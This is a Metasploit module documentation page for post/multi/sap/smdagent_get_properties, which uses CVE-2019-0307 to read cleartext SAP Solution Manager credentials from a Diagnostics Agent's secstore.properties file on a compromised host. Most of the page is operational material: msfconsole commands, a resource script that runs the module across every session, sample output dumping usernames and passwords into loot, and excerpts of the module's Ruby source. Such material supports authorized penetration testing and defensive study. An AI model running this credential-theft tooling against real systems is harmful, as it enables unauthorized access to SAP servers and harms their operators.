Diagnostics Agent in Solution Manager, stores unencrypted credentials for Solution Manager server - Metasploit
This page contains detailed information about how to use the post/multi/sap/smdagent_get_properties metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: Diagnostics Agent in Solution Manager, stores unencrypted credentials for Solution Manager server
Module: post/multi/sap/smdagent_get_properties
Source code: modules/post/multi/sap/smdagent_get_properties.rb
Disclosure date: -
Last modification time: 2021-10-06 13:43:31 +0000
Supported architecture(s): -
Supported platform(s): BSD, Linux, OSX, Unix, Windows
Target service / protocol: -
Target network port(s): -
List of CVEs: CVE-2019-0307
This module retrieves the secstore.properties
file on a
SMDAgent. This file contains the credentials used by the
SMDAgent to connect to the SAP Solution Manager server.
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Basic Usage
There are two ways to execute this post module.
From the Meterpreter prompt
The first is by using the "run" command at the Meterpreter prompt. It allows you to run the post module against that specific session:
meterpreter > run post/multi/sap/smdagent_get_properties
From the msf prompt
The second is by using the "use" command at the msf prompt. You will have to figure out which session ID to set manually. To list all session IDs, you can use the "sessions" command.
msf > use post/multi/sap/smdagent_get_properties
msf post(smdagent_get_properties) > show options
... show and set options ...
msf post(smdagent_get_properties) > set SESSION session-id
msf post(smdagent_get_properties) > exploit
If you wish to run the post against all sessions from framework, here is how:
1 - Create the following resource script:
framework.sessions.each_pair do |sid, session|
run_single("use post/multi/sap/smdagent_get_properties")
run_single("set SESSION #{sid}")
run_single("run")
end
2 - At the msf prompt, execute the above resource script:
msf > resource path-to-resource-script
Required Options
- SESSION: The session to run this module on.
Knowledge Base
Vulnerable Application
This module retrieves the secstore.properties
file on a SMDAgent.
This file contains the credentials used by the SMDAgent to connect to the SAP Solution Manager server.
Verification Steps
- Get a
shell
ormeterpreter
session on some host. - Do:
use post/multi/sap/smdagent_get_properties
- Do:
set SESSION [SESSION_ID]
, replacing[SESSION_ID]
with the session number you wish to run this one. - Do:
run
- If the system has configuration files containing unencrypted credentials for the SAP Solution Manager server, they will be printed out.
Options
None.
Scenarios
msf6 post(multi/sap/smdagent_get_properties) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell linux SSH daaadm:TestPass1 (172.16.30.14:22) 192.168.50.2:58316 -> 172.16.30.14:22 (172.16.30.14)
2 meterpreter x64/windows SAP731\Administrator @ SAP731 0.0.0.0:0 -> 172.16.30.80:4444 (172.16.30.80)
msf6 post(multi/sap/smdagent_get_properties) > set SESSION 1
SESSION => 1
msf6 post(multi/sap/smdagent_get_properties) > run
[+] File /usr/sap/DAA/SMDA98/SMDAgent/configuration/runtime.properties saved in: /Users/vladimir/.msf4/loot/20210329205801_SAP_TEST_172.16.30.14_smdagent.propert_457968.txt
[+] File /usr/sap/DAA/SMDA98/SMDAgent/configuration/secstore.properties saved in: /Users/vladimir/.msf4/loot/20210329205811_SAP_TEST_172.16.30.14_smdagent.propert_587689.txt
[*] Instance: SMDA98
[*] Runtime properties file name: /usr/sap/DAA/SMDA98/SMDAgent/configuration/runtime.properties
[*] Secstore properties file name: /usr/sap/DAA/SMDA98/SMDAgent/configuration/secstore.properties
[*] SLD properties:
[*] SLD protocol: http
[*] SLD hostname: solman.corp.test.com
[*] SLD port: 50000
[+] SLD username: j2ee_admin
[+] SLD password: asdQWE123
[*] SMD properties:
[*] SMD url: p4://172.16.30.46:50004
[+] SMD username: j2ee_admin
[+] SMD password: asdQWE123
[+] Store decoded credentials for SolMan server
[*] Post module execution completed
msf6 post(multi/sap/smdagent_get_properties) > set SESSION 2
SESSION => 2
msf6 post(multi/sap/smdagent_get_properties) > run
[+] File c:\usr\sap\DAA\SMDA97\SMDAgent\configuration\runtime.properties saved in: /Users/vladimir/.msf4/loot/20210329205823_SAP_TEST_172.16.30.80_smdagent.propert_357417.txt
[+] File c:\usr\sap\DAA\SMDA97\SMDAgent\configuration\secstore.properties saved in: /Users/vladimir/.msf4/loot/20210329205823_SAP_TEST_172.16.30.80_smdagent.propert_604626.txt
[*] Instance: SMDA97
[*] Runtime properties file name: c:\usr\sap\DAA\SMDA97\SMDAgent\configuration\runtime.properties
[*] Secstore properties file name: c:\usr\sap\DAA\SMDA97\SMDAgent\configuration\secstore.properties
[*] SLD properties:
[*] SLD protocol: http
[*] SLD hostname: 172.16.30.46
[*] SLD port: 50000
[+] SLD username: SLDDSUSER
[+] SLD password: asdQWE123
[*] SMD properties:
[*] SMD url: p4://172.16.30.46:50004
[+] SMD username: j2ee_admin
[+] SMD password: asdQWE123
[+] Store decoded credentials for SolMan server
[*] Post module execution completed
msf6 post(multi/sap/smdagent_get_properties) > creds
Credentials
===========
host origin service public private realm private_type JtR Format
---- ------ ------- ------ ------- ----- ------------ ----------
172.16.30.100 172.16.30.100 50000/tcp (http) j2ee_admin asdQWE123 Password
172.16.30.100 172.16.30.100 50000/tcp (http) SLDDSUSER asdQWE123 Password
msf6 post(multi/sap/smdagent_get_properties) > services
Services
========
host port proto name state info
---- ---- ----- ---- ----- ----
172.16.30.46 50000 tcp soap open SAP Solution Manager
msf6 post(multi/sap/smdagent_get_properties) > vulns
Vulnerabilities
===============
Timestamp Host Name References
--------- ---- ---- ----------
2021-03-29 17:58:11 UTC 172.16.30.14 Diagnostics Agent in Solution Manager, stores unencrypted CVE-2019-0307,URL-https://conference.hitb.org/hitblockdown
credentials for Solution Manager server 002/materials/D2T1%20-%20SAP%20RCE%20-%20The%20Agent%20Who
%20Spoke%20Too%20Much%20-%20Yvan%20Genuer.pdf
2021-03-29 17:58:23 UTC 172.16.30.80 Diagnostics Agent in Solution Manager, stores unencrypted CVE-2019-0307,URL-https://conference.hitb.org/hitblockdown
credentials for Solution Manager server 002/materials/D2T1%20-%20SAP%20RCE%20-%20The%20Agent%20Who
%20Spoke%20Too%20Much%20-%20Yvan%20Genuer.pdf
Go back to menu.
Msfconsole Usage
Here is how the multi/sap/smdagent_get_properties post exploitation module looks in the msfconsole:
msf6 > use post/multi/sap/smdagent_get_properties
msf6 post(multi/sap/smdagent_get_properties) > show info
Name: Diagnostics Agent in Solution Manager, stores unencrypted credentials for Solution Manager server
Module: post/multi/sap/smdagent_get_properties
Platform: BSD, Linux, OSX, Unix, Windows
Arch:
Rank: Normal
Provided by:
Yvan Genuer
Vladimir Ivanov
Compatible session types:
Meterpreter
Shell
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
Description:
This module retrieves the `secstore.properties` file on a SMDAgent.
This file contains the credentials used by the SMDAgent to connect
to the SAP Solution Manager server.
References:
https://nvd.nist.gov/vuln/detail/CVE-2019-0307
https://conference.hitb.org/hitblockdown002/materials/D2T1%20-%20SAP%20RCE%20-%20The%20Agent%20Who%20Spoke%20Too%20Much%20-%20Yvan%20Genuer.pdf
Module Options
This is a complete list of options available in the multi/sap/smdagent_get_properties post exploitation module:
msf6 post(multi/sap/smdagent_get_properties) > show options
Module options (post/multi/sap/smdagent_get_properties):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
Advanced Options
Here is a complete list of advanced options supported by the multi/sap/smdagent_get_properties post exploitation module:
msf6 post(multi/sap/smdagent_get_properties) > show advanced
Module advanced options (post/multi/sap/smdagent_get_properties):
Name Current Setting Required Description
---- --------------- -------- -----------
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Post Actions
This is a list of all post exploitation actions which the multi/sap/smdagent_get_properties module can do:
msf6 post(multi/sap/smdagent_get_properties) > show actions
Post actions:
Name Description
---- -----------
Evasion Options
Here is the full list of possible evasion options supported by the multi/sap/smdagent_get_properties post exploitation module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 post(multi/sap/smdagent_get_properties) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
Go back to menu.
Error Messages
This module may fail with the following error messages:
Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.
SAP root directory not found
Here is a relevant code snippet related to the "SAP root directory not found" error message:
57: windows = false
58: instances = dir(UNIX_PREFIX)
59: end
60:
61: if instances.nil? || instances.empty?
62: fail_with(Failure::NotFound, 'SAP root directory not found')
63: end
64:
65: instances.each do |instance|
66: next if instance == 'SYS'
67:
Failed to resolve SLD hostname: <SLD_HOSTNAME>
Here is a relevant code snippet related to the "Failed to resolve SLD hostname: <SLD_HOSTNAME>" error message:
151: else
152: begin
153: sld_address = session.net.resolve.resolve_host(sld_hostname)[:ip]
154: print_status("SLD address: #{sld_address}")
155: rescue Rex::Post::Meterpreter::RequestError
156: print_error("Failed to resolve SLD hostname: #{sld_hostname}")
157: end
158: end
159: end
160: end
161: print_status("SLD port: #{sld_port}") unless sld_port.nil?
File <SECSTORE_PROPERTIES_FILE_NAME> read, but this file is likely encrypted or does not contain credentials. This SMDAgent is likely patched.
Here is a relevant code snippet related to the "File <SECSTORE_PROPERTIES_FILE_NAME> read, but this file is likely encrypted or does not contain credentials. This SMDAgent is likely patched." error message:
173: end
174:
175: # Store decoded credentials, report service and vuln
176: print_line
177: if sld_username.nil? || sld_password.nil?
178: print_error("File #{secstore_properties_file_name} read, but this file is likely encrypted or does not contain credentials. This SMDAgent is likely patched.")
179: else
180: # Store decoded credentials
181: print_good('Store decoded credentials for SolMan server')
182: if sld_address.nil? || sld_port.nil?
183: service_data = {}
Failed to read properties file: <FILENAME>
Here is a relevant code snippet related to the "Failed to read properties file: <FILENAME>" error message:
222: def parse_properties_file(filename, is_meterpreter)
223: properties = []
224: if file_exist?(filename)
225: properties_content = read_file(filename)
226: if properties_content.nil?
227: print_error("Failed to read properties file: #{filename}")
228: else
229: if is_meterpreter
230: agent_host = Rex::Socket.getaddress(session.sock.peerhost, true)
231: else
232: agent_host = session.session_host
File: <FILENAME> does not exist
Here is a relevant code snippet related to the "File: <FILENAME> does not exist" error message:
234: loot = store_loot('smdagent.properties', 'text/plain', agent_host, properties_content, filename, 'SMD Agent properties file')
235: print_good("File #{filename} saved in: #{loot}")
236: properties = parse_properties(properties_content)
237: end
238: else
239: print_error("File: #{filename} does not exist")
240: end
241: properties
242: end
243:
244: end
References
- CVE-2019-0307
- https://conference.hitb.org/hitblockdown002/materials/D2T1%20-%20SAP%20RCE%20-%20The%20Agent%20Who%20Spoke%20Too%20Much%20-%20Yvan%20Genuer.pdf
See Also
Check also the following modules related to this module:
- auxiliary/admin/sap/cve_2020_6207_solman_rce
- auxiliary/admin/sap/cve_2020_6287_ws_add_user
- auxiliary/admin/sap/sap_configservlet_exec_noauth
- auxiliary/admin/sap/sap_igs_xmlchart_xxe
- auxiliary/admin/sap/sap_mgmt_con_osexec
- auxiliary/dos/sap/sap_soap_rfc_eps_delete_file
- auxiliary/scanner/sap/sap_ctc_verb_tampering_user_mgmt
- auxiliary/scanner/sap/sap_hostctrl_getcomputersystem
- auxiliary/scanner/sap/sap_icf_public_info
- auxiliary/scanner/sap/sap_icm_urlscan
- auxiliary/scanner/sap/sap_mgmt_con_abaplog
- auxiliary/scanner/sap/sap_mgmt_con_brute_login
- auxiliary/scanner/sap/sap_mgmt_con_extractusers
- auxiliary/scanner/sap/sap_mgmt_con_getaccesspoints
- auxiliary/scanner/sap/sap_mgmt_con_getenv
- auxiliary/scanner/sap/sap_mgmt_con_getlogfiles
- auxiliary/scanner/sap/sap_mgmt_con_getprocesslist
- auxiliary/scanner/sap/sap_mgmt_con_getprocessparameter
- auxiliary/scanner/sap/sap_mgmt_con_instanceproperties
- auxiliary/scanner/sap/sap_mgmt_con_listconfigfiles
- auxiliary/scanner/sap/sap_mgmt_con_listlogfiles
- auxiliary/scanner/sap/sap_mgmt_con_startprofile
- auxiliary/scanner/sap/sap_mgmt_con_version
- auxiliary/scanner/sap/sap_router_info_request
- auxiliary/scanner/sap/sap_router_portscanner
- auxiliary/scanner/sap/sap_service_discovery
- auxiliary/scanner/sap/sap_smb_relay
- auxiliary/scanner/sap/sap_soap_bapi_user_create1
- auxiliary/scanner/sap/sap_soap_rfc_brute_login
- auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_call_system_command_exec
- auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_command_exec
- auxiliary/scanner/sap/sap_soap_rfc_eps_get_directory_listing
- auxiliary/scanner/sap/sap_soap_rfc_pfl_check_os_file_existence
- auxiliary/scanner/sap/sap_soap_rfc_ping
- auxiliary/scanner/sap/sap_soap_rfc_read_table
- auxiliary/scanner/sap/sap_soap_rfc_rzl_read_dir
- auxiliary/scanner/sap/sap_soap_rfc_susr_rfc_user_interface
- auxiliary/scanner/sap/sap_soap_rfc_sxpg_call_system_exec
- auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec
- auxiliary/scanner/sap/sap_soap_rfc_system_info
- auxiliary/scanner/sap/sap_soap_th_saprel_disclosure
- auxiliary/scanner/sap/sap_web_gui_brute_login
- exploit/multi/sap/cve_2020_6207_solman_rs
- exploit/multi/sap/sap_mgmt_con_osexec_payload
- exploit/multi/sap/sap_soap_rfc_sxpg_call_system_exec
- exploit/multi/sap/sap_soap_rfc_sxpg_command_exec
Authors
- Yvan Genuer
- Vladimir Ivanov
Version
This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.
Go back to menu.